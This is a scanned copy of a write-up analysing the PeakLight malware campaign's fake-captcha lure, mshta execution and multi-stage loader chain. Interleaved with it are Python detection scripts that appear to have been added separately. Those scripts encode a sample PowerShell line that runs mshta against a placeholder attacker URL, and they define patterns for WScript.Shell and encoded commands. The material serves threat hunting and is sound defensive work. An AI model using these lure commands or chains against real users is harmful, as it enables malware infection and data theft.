himitsuflavor.medium.com (2606:4700:7::a29f:9804), urlscan public scan

Submitted URL: https://infosecwriteups.com/peaklight-campaign-mshta-a7f45aec50ab?source=rss------threat_intelligence-5%27
Effective URL: https://himitsuflavor.medium.com/peaklight-campaign-mshta-a7f45aec50ab?source=rss------threat_intelligence-5%27
Submission: On September 17 via api from US — Scanned from DE

PEAKLIGHT CAMPAIGN — MSHTA

NaotaClone · Published in InfoSec Write-ups · 5 min read · 2 hours ago
PEAKLIGHT MALWARE

In recent months the PeakLight malware has gained prominence through an aggressive
infection campaign delivered via CDN (Content Delivery Network) links, which trick
the user into executing encoded command lines or malicious artifacts through fake
captcha and/or verification portals (Image 1.1).


Image 1.1 Infection Method — High Level.

It is designed to steal information from, and take over, infected workstations,
relying on several persistence techniques and on techniques for evading protection
and detection, such as indirect execution through LOLBINs and a multi-stage
infection chain. It also abuses directories with global (world-writable)
permissions to ease the deployment of its artifacts, and, being modular, it uses
both legitimate artifacts (software produced by legitimate companies) and
malicious artifacts that complete the infection process.


INFECTION CHAIN

Several intelligence sources confirm that the initial point of infection is
advertising and pop-ups on various Internet pages that redirect to a site under
the domain *.b-cdn.net/* (image 2.1), which hosts a verification captcha
instructing the user to open Run on the system and paste a value.


Image 2.1 b-cdn.net site with fake captcha.

That string is copied to the clipboard automatically when the user clicks the
check button, via the document.execCommand() function (image 2.2); the script sets
the copied value to a Base64-encoded PowerShell line that executes the command
Mshta.exe “<evil_url>”.


Image 2.2 Script within the “*.b-cdn.net” site.

For the infection chain to continue, the victim must perform these steps manually,
which creates the conditions for deploying the artifacts; this activity can be
identified by executions of Powershell.exe whose parent process is Explorer.exe.

As an example, this execution was reproduced and Event ID 1 (Process Created)
records the parameters described above (image 2.3).


Image 2.3 Powershell execution logs via Run.
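The detection the preceding paragraphs point at (Powershell.exe with an Explorer.exe parent, carrying an encoded command that calls Mshta.exe) can be checked over Sysmon Event ID 1 records. The Python below is an added example, not code from the article or its author: the three events, the placeholder URL and the command-line spellings are constructed for illustration, and field names follow the Sysmon schema.

```python
import base64
import binascii
import re


def encode_powershell(command):
    """Encode a PowerShell line the way -EncodedCommand expects it: UTF-16LE, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon Event ID 1 records (field names follow the Sysmon schema,
# values are invented; the URL is a placeholder, not the campaign's real one).
SAMPLE_EVENTS = [
    {   # the pattern from the article: Explorer (Run dialog) -> PowerShell -> mshta
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell -w hidden -enc "
        + encode_powershell('mshta.exe "https://evil.example/Downloads/PLACEHOLDER"'),
    },
    {   # an encoded command too, but a benign one launched from a cmd.exe prompt
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell -enc " + encode_powershell("Get-Process | Out-Null"),
    },
    {   # an ordinary user launching Notepad from Explorer
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe",
    },
]

# powershell.exe accepts -EncodedCommand, any prefix of it (-e, -en, -enc, ...) and -ec,
# so the matcher tries the longest spelling first.
_SPELLINGS = ["encodedcommand"[:i] for i in range(14, 0, -1)] + ["ec"]
ENCODED_ARG = re.compile(
    r"(?:^|\s)[-/](?:" + "|".join(_SPELLINGS) + r")\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand script text, or None if the line carries none."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        text = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # A genuine encoded command decodes to readable script text, not binary noise.
    if not all(ch.isprintable() or ch.isspace() for ch in text):
        return None
    return text


def analyze_event(event):
    """Match one process-creation record against the execution pattern described above."""
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    findings = []
    from_explorer = image.endswith("\\powershell.exe") and parent.endswith("\\explorer.exe")
    if from_explorer:
        findings.append("powershell.exe spawned by explorer.exe (Run dialog pattern)")
    decoded = decode_encoded_command(event["CommandLine"])
    invokes_mshta = False
    if decoded is not None:
        findings.append("encoded PowerShell command line")
        invokes_mshta = re.search(r"\bmshta(?:\.exe)?\b", decoded, re.IGNORECASE) is not None
        if invokes_mshta:
            findings.append("decoded command invokes mshta")
        for url in re.findall(r"https?://[^\s\"']+", decoded):
            findings.append("remote URL in decoded command: " + url)
    return {
        "decoded": decoded,
        "findings": findings,
        # Explorer -> encoded PowerShell, or any encoded mshta call, is worth triage.
        "suspicious": invokes_mshta or (from_explorer and decoded is not None),
    }


def scan(events):
    """Indexes of the events that warrant triage."""
    return [i for i, event in enumerate(events) if analyze_event(event)["suspicious"]]


if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        print(i, analyze_event(SAMPLE_EVENTS[i]))
```

Decoding the argument rather than matching on the Base64 text is the point: the encoded blob changes with every URL, while the decoded script exposes the mshta call and the remote URL directly, and the parent-process condition separates the Run-dialog pattern from scripted administrative use.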

Consequently, the payload contained in the PowerShell line is an Mshta.exe command
line (image 2.4), which indirectly executes the malicious artifact fetched by
mshta.exe “clicktogo[*]click/Downloads/tra3” (image 2.5).


Figure 2.4 MSHTA Command Line.

Image 2.5 Download of tra3.

The content served as tra3 (image 2.5) is a compressed JavaScript file with two
layers of obfuscation (image 2.6), based on substituting values by their position
within variables.


Image 2.6 JavaScript code obfuscated in tra3.

Once the first layer has been deobfuscated, calls to several functions are
observed that execute the result of the second deobfuscation step through the
ActiveXObject function (used to create COM objects), held in the Bin variable
(image 2.7).


Image 2.7 Second phase of deobfuscation.
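As an added illustration (not the author's code and not the actual tra3 script), the Python below resolves the kind of positional string substitution described above on a constructed JavaScript stand-in: the real strings sit in an array, the code refers to them only by index, and some literals are split with "+". The sample script, the array name _0x4f and the placeholder command are invented for the example; real samples may also rotate the array or encode the strings further, which this resolver does not attempt.

```python
import re

# Constructed stand-in for the first obfuscation layer described above. Everything
# here is invented (array name, command string); it only mirrors the structure.
SAMPLE_JS = r'''
var _0x4f = ["WScr" + "ipt.Shell", "R" + "un", "powershell -w hidden -enc PLACEHOLDER"];
var Bin = new ActiveXObject(_0x4f[0x0]);
Bin[_0x4f[1]](_0x4f[2], 0, false);
'''

DQ_STRING = r'"(?:[^"\\]|\\.)*"'                      # one double-quoted literal
CONCAT = re.compile("(" + DQ_STRING + r")\s*\+\s*(" + DQ_STRING + ")")
ARRAY_DEF = re.compile(r"var\s+(\w+)\s*=\s*\[([^\]]*)\]\s*;")


def collapse_concats(js):
    """Fold "a" + "b" into "ab" until nothing changes (double-quoted literals only)."""
    previous = None
    while previous != js:
        previous = js
        js = CONCAT.sub(lambda m: m.group(1)[:-1] + m.group(2)[1:], js)
    return js


def extract_string_arrays(js):
    """Map each `var NAME = [ ... ];` made only of string literals to its items."""
    arrays = {}
    for m in ARRAY_DEF.finditer(js):
        items = re.findall(DQ_STRING, m.group(2))
        # skip arrays that hold anything other than string literals
        if items and re.sub(DQ_STRING, "", m.group(2)).strip(", \n\t") == "":
            arrays[m.group(1)] = items
    return arrays


def resolve_positional_strings(js):
    """Replace NAME[index] references with the literal they point at, then drop the array."""
    js = collapse_concats(js)
    for name, items in extract_string_arrays(js).items():
        ref = re.compile(r"\b" + re.escape(name) + r"\[\s*(0x[0-9a-fA-F]+|\d+)\s*\]")

        def lookup(m, items=items):
            raw = m.group(1)
            index = int(raw, 16) if raw.lower().startswith("0x") else int(raw)
            return items[index] if index < len(items) else m.group(0)  # keep unresolved refs

        js = ref.sub(lookup, js)
        js = re.sub(r"var\s+" + re.escape(name) + r"\s*=\s*\[[^\]]*\]\s*;\n?", "", js)
    return collapse_concats(js)


# Things an analyst looks for once the strings are readable.
INDICATORS = {
    "wscript_shell": re.compile(r'ActiveXObject\(\s*"WScript\.Shell"\s*\)', re.IGNORECASE),
    "shell_run": re.compile(r'\.Run\s*\(|\["Run"\]\s*\(', re.IGNORECASE),
    "powershell": re.compile(r'"[^"]*powershell[^"]*"', re.IGNORECASE),
}


def find_indicators(js):
    """Names of the indicators present in the (ideally already resolved) script text."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(js)]


if __name__ == "__main__":
    resolved = resolve_positional_strings(SAMPLE_JS)
    print(resolved)
    print("before:", find_indicators(SAMPLE_JS), "after:", find_indicators(resolved))
```

Run as-is, the indicator check on the raw sample only sees the "powershell" literal; after resolution the WScript.Shell creation and the Run call become visible, which is why static string resolution is worth doing before writing signatures against such scripts.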

After the second layer, the fully deobfuscated script can be seen: it creates the
WScript.Shell object and executes system command lines through Bin.Run, whose
argument is a PowerShell script encrypted with AES (image 2.8).


Image 2.9 Completely deobfuscated JavaScript code.

This execution makes a network connection (image 2.11) to the URL
clicktogo[*]click/Downloads/tar3.zip, obtained after decrypting and deobfuscating
the PowerShell command line.


Figure 2.10 Network Connections — DNS Query.

This process downloads and drops on the system the various artifacts (image 2.11)
that the attacker uses (image 2.12) in the attack chain.


Figure 2.11 Creating Files through tar3.zip.

Figure 2.12 Binary Setup.exe generated by “tar3.zip”.

Among the artifacts dropped is Setup.exe (image 2.12), which runs automatically
when the encrypted PowerShell executes and which spawns the more.com process and
its conhost.exe (image 2.13).


Figure 2.13 Execution of Setup.exe.

In turn, the More.com process spawns another process, RewardFlaccid.a3x
(Figure 2.15), approximately 15 seconds after the Setup.exe process ends.


Figure 2.15 Network activity generated by RewardFlaccid.a3x.

> Once the network activity generated by RewardFlaccid.a3x is finished, the
> process is terminated and the infection chain culminates with all the
> artifacts already deployed on the victim’s station.


INFECTION CHAIN

Given the analysis carried out, the infection process can be summarized in 4
phases (Figure 3.1):

1. Initial Phase: the user browses Internet sites that contain ads and/or pop-ups
related to PeakLight’s campaigns.

2. Access Point: the user falls for the attack by following the manual execution
instructions shown on the attacker’s site.

3. Execution Point: the absence of restrictions on running command lines from the
terminal allows the indirect execution of Mshta.exe, which downloads the
artifacts.

4. Deployment Point: once downloaded, the artifacts are deployed under the
AppData\Local\* directory and run autonomously, making TLS connections to the
attacker’s site and completing the infection process.


Figure 3.1 Summary of infection chain.
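To hunt for the four phases as a whole rather than for any single event, the process tree can be reconstructed from Sysmon process-creation (Event ID 1) and network-connection (Event ID 3) records and searched for processes under AppData\Local whose ancestry passes through mshta.exe. The Python below is an added example, not code from the article: the events, PIDs, paths and destination hosts are constructed placeholders that mirror the chain described, and linking records by ProcessId alone is a simplification (Sysmon's ProcessGuid is the key that survives PID reuse).

```python
import ntpath
from collections import defaultdict

# Constructed Sysmon-style records (not from the article). Event ID 1 is process
# creation, Event ID 3 a network connection. PIDs, paths and hosts are invented.
EVENTS = [
    {"EventID": 1, "ProcessId": 100, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 200, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 1, "ProcessId": 300, "ParentProcessId": 200, "Image": r"C:\Windows\System32\mshta.exe"},
    {"EventID": 1, "ProcessId": 400, "ParentProcessId": 300,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 1, "ProcessId": 500, "ParentProcessId": 400,
     "Image": r"C:\Users\victim\AppData\Local\PLACEHOLDER\Setup.exe"},
    {"EventID": 1, "ProcessId": 600, "ParentProcessId": 500, "Image": r"C:\Windows\System32\more.com"},
    {"EventID": 1, "ProcessId": 700, "ParentProcessId": 600,
     "Image": r"C:\Users\victim\AppData\Local\PLACEHOLDER\RewardFlaccid.a3x"},
    {"EventID": 3, "ProcessId": 700, "DestinationHostname": "attacker.example", "DestinationPort": 443},
    # benign: a self-updating application under AppData\Local started from Explorer
    {"EventID": 1, "ProcessId": 800, "ParentProcessId": 100,
     "Image": r"C:\Users\victim\AppData\Local\PLACEHOLDER\Updater.exe"},
    {"EventID": 3, "ProcessId": 800, "DestinationHostname": "vendor.example", "DestinationPort": 443},
]


def build_tree(events):
    """Index process-creation records by PID and by parent PID.

    Keying on ProcessId is a simplification: Windows reuses PIDs, so real
    telemetry should be keyed on Sysmon's ProcessGuid instead.
    """
    procs, children = {}, defaultdict(list)
    for ev in events:
        if ev["EventID"] == 1:
            procs[ev["ProcessId"]] = ev
            children[ev["ParentProcessId"]].append(ev["ProcessId"])
    return procs, children


def lineage(pid, procs):
    """Image basenames from the oldest known ancestor down to pid."""
    names, seen = [], set()
    while pid in procs and pid not in seen:      # `seen` guards against PID-reuse loops
        seen.add(pid)
        names.append(ntpath.basename(procs[pid]["Image"]))
        pid = procs[pid]["ParentProcessId"]
    return names[::-1]


def subtree(pid, children):
    """pid plus every descendant PID."""
    out, stack = set(), [pid]
    while stack:
        current = stack.pop()
        if current not in out:
            out.add(current)
            stack.extend(children.get(current, []))
    return out


def find_chains(events):
    """Processes under AppData\\Local whose ancestry passes through mshta.exe, noting
    whether they or their descendants opened a connection to the TLS port."""
    procs, children = build_tree(events)
    tls_pids = {ev["ProcessId"] for ev in events
                if ev["EventID"] == 3 and ev.get("DestinationPort") == 443}
    hits = []
    for pid, ev in procs.items():
        if "\\appdata\\local\\" not in ev["Image"].lower():
            continue
        chain = lineage(pid, procs)
        if "mshta.exe" not in (name.lower() for name in chain):
            continue
        hits.append({"pid": pid, "lineage": chain,
                     "tls_connection": bool(subtree(pid, children) & tls_pids)})
    return hits


if __name__ == "__main__":
    for hit in find_chains(EVENTS):
        print(hit["pid"], " -> ".join(hit["lineage"]), "tls:", hit["tls_connection"])
```

The benign updater in the sample also lives under AppData\Local and also talks TLS, so neither property alone is a useful signal; it is the mshta.exe ancestor in the lineage, i.e. phase 3 of the summary, that separates the two cases.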

Tags: Threat Hunting, Malware, Threat Intelligence, Threat Modeling, Threat Detection